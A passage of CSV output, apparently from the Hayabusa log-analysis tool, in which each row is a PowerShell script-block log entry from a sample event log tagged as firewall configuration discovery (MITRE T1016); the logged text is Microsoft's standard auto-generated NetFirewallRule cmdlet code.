@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml 
}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Owner}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Program}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Package}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] 
[ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"{ $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 
'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = 
${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { [object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} 
} else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 
